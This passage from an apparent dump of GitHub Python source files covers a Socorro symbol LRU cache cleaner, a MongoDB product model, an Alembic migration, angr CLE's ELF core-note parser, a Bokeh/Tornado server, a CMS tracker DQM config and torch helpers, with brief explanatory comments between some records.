%s', event.pathname)\n self.monitor._update_cache(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_OPEN(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('O')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('O %s', event.pathname)\n self.monitor._update_cache(event.pathname)\n\n # -------------------------------------------------------------------------\n def process_IN_MODIFY(self, event):\n if not event.dir:\n if self.verbosity == 1:\n sys.stdout.write('M')\n sys.stdout.flush()\n elif self.verbosity == 2:\n self.monitor.config.logger.debug('M %s', event.pathname)\n self.monitor._update_cache(event.pathname, update_size=True)\n\n\n# 
-----------------------------------------------------------------------------\ndef from_string_to_parse_size(size_as_string):\n '''\n Parse a size argument of the form \\d+[kMG] that represents a size in\n bytes, with the suffixes representing kilobytes, megabytes or gigabytes\n respectively.\n '''\n suffixes = {\n 'k': 1024,\n 'M': 1024 ** 2,\n 'G': 1024 ** 3,\n }\n if not isinstance(size_as_string, basestring) or not size_as_string:\n raise ValueError('Bad size value: \"%s\"' % size_as_string)\n\n if size_as_string[-1].isdigit():\n return int(size_as_string)\n\n if size_as_string[-1] not in suffixes:\n raise ValueError('Unknown size suffix: \"%s\"' % size_as_string[-1])\n\n return int(size_as_string[:-1]) * suffixes[size_as_string[-1]]\n\n\n# =============================================================================\nclass SymbolLRUCacheManager(RequiredConfig):\n \"\"\"for cleaning up the symbols cache\"\"\"\n required_config = Namespace()\n required_config.add_option(\n 'symbol_cache_path',\n doc=\"the cache directory to automatically remove files from\",\n default=os.path.join(tempfile.gettempdir(), 'symbols')\n )\n required_config.add_option(\n 'symbol_cache_size',\n doc=\"the maximum size of the symbols cache\",\n default='1G',\n from_string_converter=from_string_to_parse_size\n )\n required_config.add_option(\n 'verbosity',\n doc=\"how chatty should this be? 1 - writes to stdout,\"\n \" 2 - uses the logger\",\n default=0,\n from_string_converter=int\n )\n\n # -------------------------------------------------------------------------\n def __init__(self, config, quit_check_callback=None):\n \"\"\"constructor for a registration object that runs an LRU cache\n cleaner\"\"\"\n self.config = config\n\n self.directory = os.path.abspath(config.symbol_cache_path)\n self.max_size = config.symbol_cache_size\n self.verbosity = config.verbosity\n # Cache state\n self.total_size = 0\n self._lru = OrderedDict()\n # pyinotify bits\n self._wm = pyinotify.WatchManager()\n self._handler = EventHandler(self, verbosity=config.verbosity)\n self._notifier = pyinotify.ThreadedNotifier(self._wm, self._handler)\n mask = pyinotify.IN_DELETE | pyinotify.IN_CREATE \\\n | pyinotify.IN_OPEN | pyinotify.IN_MOVED_FROM \\\n | pyinotify.IN_MOVED_TO | pyinotify.IN_MODIFY\n self._wdd = self._wm.add_watch(\n self.directory,\n mask,\n rec=True,\n auto_add=True\n )\n # Load existing files into the cache.\n self._get_existing_files(self.directory)\n self._notifier.start()\n\n # -------------------------------------------------------------------------\n @property\n def num_files(self):\n return len(self._lru)\n\n # -------------------------------------------------------------------------\n def _rm_empty_dirs(self, path):\n '''\n Attempt to remove any empty directories that are parents of path\n and children of self.directory.\n '''\n path = os.path.dirname(path)\n while not os.path.samefile(path, self.directory):\n if not os.listdir(path):\n os.rmdir(path)\n path = os.path.dirname(path)\n\n # -------------------------------------------------------------------------\n def _update_cache(self, path, update_size=False):\n if path in self._lru:\n size = self._lru.pop(path)\n if update_size:\n self.total_size -= size\n else:\n update_size = True\n\n if update_size:\n try:\n size = os.stat(path).st_size\n except OSError:\n self.config.logger.warning(\n 'file was not found while cleaning cache: %s', path\n )\n return\n\n self.total_size += size\n # If we're out of space, remove items from the cache until\n # we fit again.\n 
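The cache above is an OrderedDict used as an LRU: `_update_cache` pops and re-inserts a touched path so the most recent entry sits at the end, and eviction pops from the front with `popitem(last=False)`. The same mechanism minus the filesystem and inotify plumbing (byte sizes below are made up):

from collections import OrderedDict

class LRUSizeCache:
    def __init__(self, max_size):
        self.max_size = max_size
        self.total = 0
        self._lru = OrderedDict()

    def touch(self, key, size):
        if key in self._lru:
            self.total -= self._lru.pop(key)   # re-insertion moves it to the MRU end
        self.total += size
        while self.total > self.max_size and self._lru:
            old_key, old_size = self._lru.popitem(last=False)   # evict LRU entry
            self.total -= old_size
            print("evict", old_key)
        self._lru[key] = size

cache = LRUSizeCache(max_size=100)
cache.touch("a.sym", 40)
cache.touch("b.sym", 40)
cache.touch("a.sym", 40)     # refresh: a.sym becomes most recent
cache.touch("c.sym", 40)     # evicts b.sym, now the least recently used
print(list(cache._lru))      # ['a.sym', 'c.sym']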
while self.total_size > self.max_size and self._lru:\n rm_path, rm_size = self._lru.popitem(last=False)\n self.total_size -= rm_size\n os.unlink(rm_path)\n self._rm_empty_dirs(rm_path)\n if self.verbosity >= 2:\n self.config.logger.debug('RM %s', rm_path)\n self._lru[path] = size\n\n # -------------------------------------------------------------------------\n def _remove_cached(self, path):\n # We might have already removed this file in _update_cache.\n if path in self._lru:\n size = self._lru.pop(path)\n self.total_size -= size\n\n # -------------------------------------------------------------------------\n def _get_existing_files(self, path):\n for base, dirs, files in os.walk(path):\n for f in files:\n f = os.path.join(base, f)\n self._update_cache(f)\n\n # -------------------------------------------------------------------------\n def close(self):\n self._notifier.stop()\n\n\n# =============================================================================\nclass NoOpCacheManager(RequiredConfig):\n def __init__(self, *args, **kwargs):\n pass\n","repo_name":"lienduo/OSS","sub_path":"CrashDump/socorro-master/socorro/processor/symbol_cache_manager.py","file_name":"symbol_cache_manager.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"2973523177","text":"import uuid\n\nfrom repositories.template.mongoRepository import MongoRepository\n\nrepo = MongoRepository(\"products\")\n\n\nclass Product:\n def __init__(self, data):\n self.data = data\n\n @staticmethod\n def get(product_id):\n product_data = repo.read({\"product_id\": product_id})\n\n if not product_data:\n return None\n else:\n return Product(product_data)\n\n @staticmethod\n def create(data):\n if not Product.check_data(data):\n raise Exception(\"Bad data\")\n repo.insert(data)\n return Product(data)\n\n @staticmethod\n def check_data(data):\n return \"name\" in data and \"product_id\" in data\n\n\nproduct = {\n \"tag_id\": uuid.uuid4(),\n \"name\": \"test name\",\n \"purchase_date\": \"test_date\",\n \"picture\": \"test_pic\"\n}\n","repo_name":"hanasmarcin/NFC-gift","sub_path":"repositories/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"16441769367","text":"\"\"\"create note, notebook, tag and relationships\n\nRevision ID: 202c1cd09f8c\nRevises: 0549af0e798c\nCreate Date: 2020-09-10 15:53:59.795159\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '202c1cd09f8c'\ndown_revision = '0549af0e798c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('tags',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=50), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('notebooks',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=50), nullable=False),\n sa.Column('shortcut', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('notes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('owner_id', sa.Integer(), nullable=False),\n sa.Column('notebook_id', sa.Integer(), nullable=False),\n sa.Column('title', sa.String(length=50), nullable=True),\n sa.Column('content', sa.Text(), nullable=True),\n sa.Column('shortcut', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['notebook_id'], ['notebooks.id'], ),\n sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('note_tags',\n sa.Column('note_id', sa.Integer(), nullable=False),\n sa.Column('tag_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['note_id'], ['notes.id'], ),\n sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], ),\n sa.PrimaryKeyConstraint('note_id', 'tag_id')\n )\n op.create_table('user_shared_notes',\n sa.Column('shared_id', sa.Integer(), nullable=False),\n sa.Column('note_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['note_id'], ['notes.id'], ),\n sa.ForeignKeyConstraint(['shared_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('shared_id', 'note_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('user_shared_notes')\n op.drop_table('note_tags')\n op.drop_table('notes')\n op.drop_table('notebooks')\n op.drop_table('tags')\n # ### end Alembic commands ###\n","repo_name":"Greg001100/Makimono","sub_path":"migrations/versions/20200910_155359_create_note_notebook_tag_and_.py","file_name":"20200910_155359_create_note_notebook_tag_and_.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"26391474113","text":"import struct\nimport elftools\nimport logging\n\nfrom .elf import ELF\nfrom .. 
import register_backend\nfrom ...errors import CLEError, CLECompatibilityError\n\nl = logging.getLogger('cle.elfcore')\n\n\nclass CoreNote(object):\n \"\"\"\n This class is used when parsing the NOTES section of a core file.\n \"\"\"\n n_type_lookup = {\n 1: 'NT_PRSTATUS',\n 2: 'NT_PRFPREG',\n 3: 'NT_PRPSINFO',\n 4: 'NT_TASKSTRUCT',\n 6: 'NT_AUXV',\n 0x53494749: 'NT_SIGINFO',\n 0x46494c45: 'NT_FILE',\n 0x46e62b7f: 'NT_PRXFPREG'\n }\n\n def __init__(self, n_type, name, desc):\n self.n_type = n_type\n if n_type in CoreNote.n_type_lookup:\n self.n_type = CoreNote.n_type_lookup[n_type]\n self.name = name\n self.desc = desc\n\n def __repr__(self):\n return \"<Note %s %s %#x>\" % (self.name, self.n_type, len(self.desc))\n\n\nclass ELFCore(ELF):\n \"\"\"\n Loader class for ELF core files.\n \"\"\"\n is_default = True # Tell CLE to automatically consider using the ELFCore backend\n\n def __init__(self, binary, **kwargs):\n super(ELFCore, self).__init__(binary, **kwargs)\n\n self.notes = [ ]\n\n # siginfo\n self.si_signo = None\n self.si_code = None\n self.si_errno = None\n\n # prstatus\n self.pr_cursig = None\n self.pr_sigpend = None\n self.pr_sighold = None\n\n self.pr_pid = None\n self.pr_ppid = None\n self.pr_pgrp = None\n self.pr_sid = None\n\n self.pr_utime_usec = None\n self.pr_stime_usec = None\n self.pr_cutime_usec = None\n self.pr_cstime_usec = None\n\n self.registers = None\n\n self.pr_fpvalid = None\n\n self.__extract_note_info()\n\n if not self.pr_fpvalid is None and (self.arch.name == 'X86' or self.arch.name == 'AMD64'):\n if not bool(self.pr_fpvalid):\n l.warning(\"No SSE registers could be loaded from core file\")\n\n @staticmethod\n def is_compatible(stream):\n stream.seek(0)\n identstring = stream.read(0x1000)\n stream.seek(0)\n if identstring.startswith('\\x7fELF'):\n if elftools.elf.elffile.ELFFile(stream).header['e_type'] == 'ET_CORE':\n return True\n return False\n return False\n\n def initial_register_values(self):\n return self.registers.iteritems()\n\n def __extract_note_info(self):\n \"\"\"\n All meaningful information about the process's state at crashtime is stored in the note segment.\n \"\"\"\n for seg_readelf in self.reader.iter_segments():\n if seg_readelf.header.p_type == 'PT_NOTE':\n self.__parse_notes(seg_readelf)\n break\n else:\n l.warning(\"Could not find note segment, cannot initialize registers\")\n\n def __parse_notes(self, seg):\n \"\"\"\n This exists, because note parsing in elftools is not good.\n \"\"\"\n\n blob = seg.data()\n\n note_pos = 0\n while note_pos < len(blob):\n name_sz, desc_sz, n_type = struct.unpack(\"<3I\", blob[note_pos:note_pos+12])\n name_sz_rounded = (((name_sz + (4 - 1)) / 4) * 4)\n desc_sz_rounded = (((desc_sz + (4 - 1)) / 4) * 4)\n # description size + the rounded name size + header size\n n_size = desc_sz_rounded + name_sz_rounded + 12\n\n # name_sz includes the null byte\n name = blob[note_pos+12:note_pos+12+name_sz-1]\n desc = blob[note_pos+12+name_sz_rounded:note_pos+12+name_sz_rounded+desc_sz]\n\n self.notes.append(CoreNote(n_type, name, desc))\n note_pos += n_size\n\n # prstatus\n prstatus = filter(lambda x: x.n_type == 'NT_PRSTATUS', self.notes)\n if len(prstatus) > 1:\n raise CLEError(\"Multiple occurences of NT_PRSTATUS notes in core file\")\n prstatus = prstatus[0]\n\n self.__parse_prstatus(prstatus)\n\n def __parse_prstatus(self, prstatus):\n \"\"\"\n Parse out the prstatus, accumulating the general purpose register values. 
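# __parse_notes above walks the PT_NOTE blob by hand because, per its
# docstring, elftools' note parsing was not trusted. Each note is a 12-byte
# header (namesz, descsz, type as little-endian uint32s) followed by the name
# and descriptor, each padded to a 4-byte boundary; the expression
# (((n + 3) / 4) * 4) is that rounding, written with Python 2 division. A
# version of the same walk that also runs on Python 3 (a sketch):
import struct

def round_up4(n):
    # align n up to the next multiple of 4
    return (n + 3) & ~3

def iter_notes(blob):
    pos = 0
    while pos + 12 <= len(blob):
        name_sz, desc_sz, n_type = struct.unpack("<3I", blob[pos:pos + 12])
        name = blob[pos + 12:pos + 12 + name_sz - 1]        # drop trailing NUL
        desc_off = pos + 12 + round_up4(name_sz)
        desc = blob[desc_off:desc_off + desc_sz]
        yield n_type, name, desc
        pos = desc_off + round_up4(desc_sz)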
Supports AMD64, X86, ARM, and AARCH64\n at the moment.\n\n :param prstatus: a note object of type NT_PRSTATUS.\n \"\"\"\n\n # TODO: support all architectures angr supports\n\n # extract siginfo from prstatus\n self.si_signo, self.si_code, self.si_errno = struct.unpack(\"<3I\", prstatus.desc[:12])\n\n # this field is a short, but it's padded to an int\n self.pr_cursig = struct.unpack(\"<I\", prstatus.desc[12:16])[0]\n\n arch_bytes = self.arch.bits / 8\n if arch_bytes == 4:\n fmt = \"I\"\n elif arch_bytes == 8:\n fmt = \"Q\"\n else:\n raise CLEError(\"Architecture must have a bitwidth of either 64 or 32\")\n\n self.pr_sigpend, self.pr_sighold = struct.unpack(\"<\" + (fmt * 2), prstatus.desc[16:16+(2*arch_bytes)])\n\n attrs = struct.unpack(\"<IIII\", prstatus.desc[16+(2*arch_bytes):16+(2*arch_bytes)+(4*4)])\n self.pr_pid, self.pr_ppid, self.pr_pgrp, self.pr_sid = attrs\n\n # parse out the 4 timevals\n pos = 16+(2*arch_bytes)+(4*4)\n usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos:pos+arch_bytes])[0] * 1000\n self.pr_utime_usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos+arch_bytes:pos+arch_bytes*2])[0] + usec\n\n pos += arch_bytes * 2\n usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos:pos+arch_bytes])[0] * 1000\n self.pr_stime_usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos+arch_bytes:pos+arch_bytes*2])[0] + usec\n\n pos += arch_bytes * 2\n usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos:pos+arch_bytes])[0] * 1000\n self.pr_cutime_usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos+arch_bytes:pos+arch_bytes*2])[0] + usec\n\n pos += arch_bytes * 2\n usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos:pos+arch_bytes])[0] * 1000\n self.pr_cstime_usec = struct.unpack(\"<\" + fmt, prstatus.desc[pos+arch_bytes:pos+arch_bytes*2])[0] + usec\n\n pos += arch_bytes * 2\n\n # parse out general purpose registers\n if self.arch.name == 'AMD64':\n # register names as they appear in dump\n rnames = ['r15', 'r14', 'r13', 'r12', 'rbp', 'rbx', 'r11', 'r10', 'r9', 'r8', 'rax', 'rcx', \\\n 'rdx', 'rsi', 'rdi', 'xxx', 'rip', 'cs', 'eflags', 'rsp', 'ss', 'xxx', 'xxx', 'ds', 'es', \\\n 'fs', 'gs']\n nreg = 27\n elif self.arch.name == 'X86':\n rnames = ['ebx', 'ecx', 'edx', 'esi', 'edi', 'ebp', 'eax', 'ds', 'es', 'fs', 'gs', 'xxx', 'eip', \\\n 'cs', 'eflags', 'esp', 'ss']\n nreg = 17\n elif self.arch.name == 'ARMHF' or self.arch.name == 'ARMEL':\n rnames = ['r0', 'r1', 'r2', 'r3', 'r4', 'r5', 'r6', 'r7', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', \\\n 'r14', 'r15', 'xxx', 'xxx']\n nreg = 18\n elif self.arch.name == 'AARCH64':\n rnames = ['x%d' % i for i in range(32)]\n rnames.append('pc')\n rnames.append('xxx')\n nreg = 34\n elif self.arch.name == 'MIPS32':\n rnames = ['xxx', 'xxx', 'xxx', 'xxx', 'xxx', 'xxx', \\\n 'zero', 'at', 'v0', 'v1', 'a0', 'a1', 'a2', 'a3', \\\n 't0', 't1', 't2', 't3', 't4', 't5', 't6', 't7', \\\n 's0', 's1', 's2', 's3', 's4', 's5', 's6', 's7', \\\n 't8', 't9', 'k0', 'k1', 'gp', 'sp', 's8', 'ra', \\\n 'lo', 'hi', 'pc', 'bad', 'sr', 'status', 'cuase']\n nreg = 45\n else:\n raise CLECompatibilityError(\"Architecture '%s' unsupported by ELFCore\" % self.arch.name)\n\n regvals = [ ]\n for idx in range(pos, pos+nreg*arch_bytes, arch_bytes):\n regvals.append(struct.unpack(\"<\" + fmt, prstatus.desc[idx:idx+arch_bytes])[0])\n self.registers = dict(zip(rnames, regvals))\n del self.registers['xxx']\n\n pos += nreg * arch_bytes\n self.pr_fpvalid = struct.unpack(\"<I\", prstatus.desc[pos:pos+4])[0]\n\nregister_backend('elfcore', 
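# __parse_prstatus above builds one struct format from the architecture word
# size and zips a per-arch register-name list against the unpacked words; the
# repeated 'xxx' placeholders collapse to a single dict key, which the one
# del then removes. The idiom in isolation (illustrative only):
import struct

def unpack_registers(data, names, bits=64):
    fmt = "<" + ("Q" if bits == 64 else "I") * len(names)
    values = struct.unpack(fmt, data[:struct.calcsize(fmt)])
    regs = dict(zip(names, values))   # duplicate 'xxx' keys overwrite each other
    regs.pop("xxx", None)             # discard the padding slots, if any
    return regs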
ELFCore)\n","repo_name":"another1024/angr-analysis","sub_path":"源码注释分析/cle/backends/elf/elfcore.py","file_name":"elfcore.py","file_ext":"py","file_size_in_byte":8148,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"92"} +{"seq_id":"26888311731","text":"#!/usr/bin/env python\nimport os\nimport tornado.web\nimport jinja2\nfrom bokeh.server.server import Server\nimport bar.main\n\n\nenv = jinja2.Environment(loader=jinja2.FileSystemLoader(\".\"))\n\n\nclass Index(tornado.web.RequestHandler):\n def get(self):\n template = env.get_template(\"index.html\")\n self.write(template.render(message=\"Hello, world!\"))\n\n\ndef bokeh_server():\n extra_patterns = [\n ('/', Index),\n (r\"/_static/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./_static\"}),\n (r\"/bar/static/(.*)\", tornado.web.StaticFileHandler, {\"path\": \"./bar/static\"})\n ]\n return Server({\"/bkapp\": bar.main.app}, extra_patterns=extra_patterns)\n\n\nif __name__ == '__main__':\n print(\"starting bokeh server\")\n server = bokeh_server()\n server.io_loop.start()\n","repo_name":"andrewgryan/bokeh-playground","sub_path":"tornado/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"71436426861","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"SiStrpDQMLive\")\n\nprocess.MessageLogger = cms.Service(\"MessageLogger\",\n debugModules = cms.untracked.vstring('siStripDigis', \n 'siStripClusters', \n 'siStripZeroSuppression', \n 'SiStripClusterizer'),\n cout = cms.untracked.PSet(threshold = cms.untracked.string('ERROR')),\n destinations = cms.untracked.vstring('cout')\n)\n\n#----------------------------\n# Event Source\n#-----------------------------\nprocess.load(\"DQM.Integration.test.inputsource_cfi\")\nprocess.EventStreamHttpReader.consumerName = 'SiStrip DQM Consumer'\nprocess.EventStreamHttpReader.SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring(\n 'HLT_MinBia*','HLT_Jet*','HLT_DiJet*','HLT_HT100U','HLT_MultiVertex*','HLT_Pixel*'))\n#process.EventStreamHttpReader.sourceURL = cms.string('http://dqm-c2d07-30.cms:22100/urn:xdaq-application:lid=30')\n\n\n#----------------------------\n# DQM Environment\n#-----------------------------\nprocess.load(\"DQMServices.Core.DQM_cfg\")\nprocess.DQMStore.referenceFileName = '/dqmdata/dqm/reference/sistrip_reference.root'\nprocess.DQM.filter = '^(SiStrip|Tracking)(/[^/]+){0,5}$'\n\nprocess.load(\"DQMServices.Components.DQMEnvironment_cfi\")\n\n#----------------------------\n# DQM Live Environment\n#-----------------------------\nprocess.load(\"DQM.Integration.test.environment_cfi\")\nprocess.dqmEnv.subSystemFolder = \"SiStrip\"\nprocess.dqmSaver.producer = \"Playback\"\nprocess.dqmSaver.saveByTime = 16\nprocess.dqmSaver.saveByMinute = 16\n\nprocess.dqmEnvTr = cms.EDAnalyzer(\"DQMEventInfo\",\n subSystemFolder = cms.untracked.string('Tracking'),\n eventRateWindow = cms.untracked.double(0.5),\n eventInfoFolder = cms.untracked.string('EventInfo')\n)\n\n#-----------------------------\n# Magnetic Field\n#-----------------------------\n# 0T field\n#process.load(\"Configuration.StandardSequences.MagneticField_0T_cff\")\n# 3.8T field\n#process.load(\"Configuration.StandardSequences.MagneticField_38T_cff\")\n# 4.0T 
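# The tornado/bokeh record above mounts a Bokeh application at /bkapp next to
# plain Tornado handlers via Server(..., extra_patterns=...). A minimal
# standalone version of that embedding (a sketch; 'bkapp' here is an
# illustrative app function, not the repo's bar.main.app):
from bokeh.plotting import figure
from bokeh.server.server import Server

def bkapp(doc):
    fig = figure(title="demo")
    fig.line([1, 2, 3], [2, 1, 3])
    doc.add_root(fig)

if __name__ == "__main__":
    server = Server({"/bkapp": bkapp})  # listens on :5006 by default
    server.start()
    server.io_loop.start()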
field\n#process.load(\"Configuration.StandardSequences.MagneticField_40T_cff\")\n#process.prefer(\"VolumeBasedMagneticFieldESProducer\")\n\nprocess.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')\n\n#-------------------------------------------------\n# GEOMETRY\n#-------------------------------------------------\nprocess.load(\"Configuration.StandardSequences.GeometryRecoDB_cff\")\n\n#--------------------------\n# Calibration\n#--------------------------\nprocess.load(\"DQM.Integration.test.FrontierCondition_GT_cfi\")\n#--------------------------------------------\n## Patch to avoid using Run Info information in reconstruction\n#\nprocess.siStripQualityESProducer.ListOfRecordToMerge = cms.VPSet(\n cms.PSet( record = cms.string(\"SiStripDetVOffRcd\"), tag = cms.string(\"\") ),\n cms.PSet( record = cms.string(\"SiStripDetCablingRcd\"), tag = cms.string(\"\") ),\n# cms.PSet( record = cms.string(\"RunInfoRcd\"), tag = cms.string(\"\") ),\n cms.PSet( record = cms.string(\"SiStripBadChannelRcd\"), tag = cms.string(\"\") ),\n cms.PSet( record = cms.string(\"SiStripBadFiberRcd\"), tag = cms.string(\"\") ),\n cms.PSet( record = cms.string(\"SiStripBadModuleRcd\"), tag = cms.string(\"\") )\n )\n#-------------------------------------------\n \n#-----------------------\n# Reconstruction Modules\n#-----------------------\n## Collision Reconstruction\nprocess.load(\"Configuration.StandardSequences.RawToDigi_Data_cff\")\nprocess.load(\"Configuration.StandardSequences.Reconstruction_cff\")\nprocess.load(\"Configuration.GlobalRuns.reco_TLR_38X\")\n\n## Cosmic Track Reconstruction\nprocess.load(\"RecoTracker.Configuration.RecoTrackerP5_cff\")\n\n# offline beam spot\nprocess.load(\"RecoVertex.BeamSpotProducer.BeamSpot_cff\")\n\n#--------------------------\n# Strip DQM Source and Client\n#--------------------------\nprocess.load(\"DQM.SiStripMonitorClient.SiStripSourceConfigP5_cff\")\nprocess.TrackMon_gentk.doLumiAnalysis = False\nprocess.TrackMon_ckf.doLumiAnalysis = False\n\nprocess.load(\"DQM.SiStripMonitorClient.SiStripClientConfigP5_cff\")\nprocess.SiStripAnalyser.TkMapCreationFrequency = -1\nprocess.SiStripAnalyser.ShiftReportFrequency = -1\nprocess.SiStripAnalyser.StaticUpdateFrequency = 5\n\n#--------------------------\n# Quality Test\n#--------------------------\nprocess.qTester = cms.EDAnalyzer(\"QualityTester\",\n qtList = cms.untracked.FileInPath('DQM/SiStripMonitorClient/data/sistrip_qualitytest_config.xml'),\n prescaleFactor = cms.untracked.int32(5), \n getQualityTestsFromFile = cms.untracked.bool(True),\n qtestOnEndLumi = cms.untracked.bool(True),\n qtestOnEndRun = cms.untracked.bool(True)\n)\n\n#--------------------------\n# Web Service\n#--------------------------\nprocess.ModuleWebRegistry = cms.Service(\"ModuleWebRegistry\")\n\nprocess.AdaptorConfig = cms.Service(\"AdaptorConfig\")\n\n#--------------------------\n# Producers\n#--------------------------\n# Event History Producer\nprocess.load(\"DPGAnalysis.SiStripTools.eventwithhistoryproducerfroml1abc_cfi\")\n\n# APV Phase Producer\nprocess.load(\"DPGAnalysis.SiStripTools.apvcyclephaseproducerfroml1ts_cfi\")\n\n\n#--------------------------\n# Filters\n#--------------------------\n# HLT Filter\nprocess.load(\"HLTrigger.special.HLTTriggerTypeFilter_cfi\")\n# 0=random, 1=physics, 2=calibration, 3=technical\nprocess.hltTriggerTypeFilter.SelectedTriggerType = 1\n\n# Global Trigger *L1GlobalTrigger) Selection for PhysicsON\nprocess.physicsBitSelector = cms.EDFilter(\"PhysDecl\",\n applyfilter = 
cms.untracked.bool(True),\n debugOn = cms.untracked.bool(False)\n )\n# L1 Trigger Bit Selection (bit 40 and 41 for BSC trigger)\nprocess.load('L1TriggerConfig.L1GtConfigProducers.L1GtTriggerMaskTechTrigConfig_cff')\nprocess.load('HLTrigger/HLTfilters/hltLevel1GTSeed_cfi')\nprocess.hltLevel1GTSeed.L1TechTriggerSeeding = cms.bool(True)\nprocess.hltLevel1GTSeed.L1SeedsLogicalExpression = cms.string('NOT (36 OR 37 OR 38 OR 39)')\n\n#--------------------------\n# Scheduling\n#--------------------------\nprocess.SiStripSources_LocalReco = cms.Sequence(process.siStripFEDMonitor*process.SiStripMonitorDigi*process.SiStripMonitorClusterReal)\nprocess.SiStripSources_TrkReco = cms.Sequence(process.SiStripMonitorTrack_gentk*process.MonitorTrackResiduals_gentk*process.TrackMon_gentk)\nprocess.SiStripSources_TrkReco_cosmic = cms.Sequence(process.SiStripMonitorTrack_ckf*process.MonitorTrackResiduals_ckf*process.TrackMon_ckf)\nprocess.SiStripClients = cms.Sequence(process.SiStripAnalyser)\nprocess.DQMCommon = cms.Sequence(process.qTester*process.dqmEnv*process.dqmEnvTr*process.dqmSaver)\nprocess.RecoForDQM_LocalReco = cms.Sequence(process.siPixelDigis*process.siStripDigis*process.gtDigis*process.trackerlocalreco)\nprocess.RecoForDQM_TrkReco = cms.Sequence(process.offlineBeamSpot*process.recopixelvertexing*process.ckftracks)\nprocess.RecoForDQM_TrkReco_cosmic = cms.Sequence(process.offlineBeamSpot*process.ctftracksP5)\n\nprocess.p = cms.Path(process.scalersRawToDigi*\n process.APVPhases*\n process.consecutiveHEs*\n process.hltTriggerTypeFilter*\n process.RecoForDQM_LocalReco*\n process.DQMCommon*\n process.SiStripClients*\n process.SiStripSources_LocalReco*\n process.hltLevel1GTSeed*\n process.RecoForDQM_TrkReco*\n process.SiStripSources_TrkReco\n)\n\n","repo_name":"cheidegg/cmg-cmssw_oldAndStable","sub_path":"DQM/Integration/rcms/sistrip_dqm_sourceclient-live_cfg.py","file_name":"sistrip_dqm_sourceclient-live_cfg.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"30047278172","text":"import operator\nfrom collections import OrderedDict\nfrom itertools import islice\n\nimport torch.nn.functional as F\nimport torch\nimport typing\nfrom torch.nn.modules.rnn import RNNCellBase\nfrom torch.nn.utils.rnn import PackedSequence\n\nfrom common.util import transform_id_to_token\n\n\ndef save_model(model: torch.nn.Module, path):\n torch.save(model.state_dict(), path)\n\ndef load_model(model: torch.nn.Module, path, map_location={}):\n model.load_state_dict(torch.load(path, map_location=map_location))\n\ndef mask_softmax(logit, mask):\n logit = logit * mask\n logit_max, _ = torch.max(logit, dim=-1, keepdim=True)\n logit = logit - logit_max\n logit_exp = torch.exp(logit) * mask\n softmax = logit_exp/torch.sum(logit_exp, dim=-1, keepdim=True)\n return softmax\n\n\ndef to_sparse(x, cuda=True, gpu_index=0):\n \"\"\" converts dense tensor x to sparse format \"\"\"\n print(torch.typename(x))\n x_typename = torch.typename(x).split('.')[-1]\n if cuda:\n sparse_tensortype = getattr(torch.cuda.sparse, x_typename)\n else:\n sparse_tensortype = getattr(torch.sparse, x_typename)\n\n indices = torch.nonzero(x)\n if len(indices.shape) == 0: # if all elements are zeros\n return sparse_tensortype(*x.shape)\n indices = indices.t()\n values = x[tuple(indices[i] for i in range(indices.shape[0]))]\n if cuda:\n return sparse_tensortype(indices, values, x.size(), device=torch.device('cuda:{}'.format(gpu_index)))\n else:\n return 
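# mask_softmax in the torch_util record above subtracts the row maximum
# before exponentiating -- the standard trick that keeps exp() from
# overflowing -- and zeroes masked positions both before and after. A common
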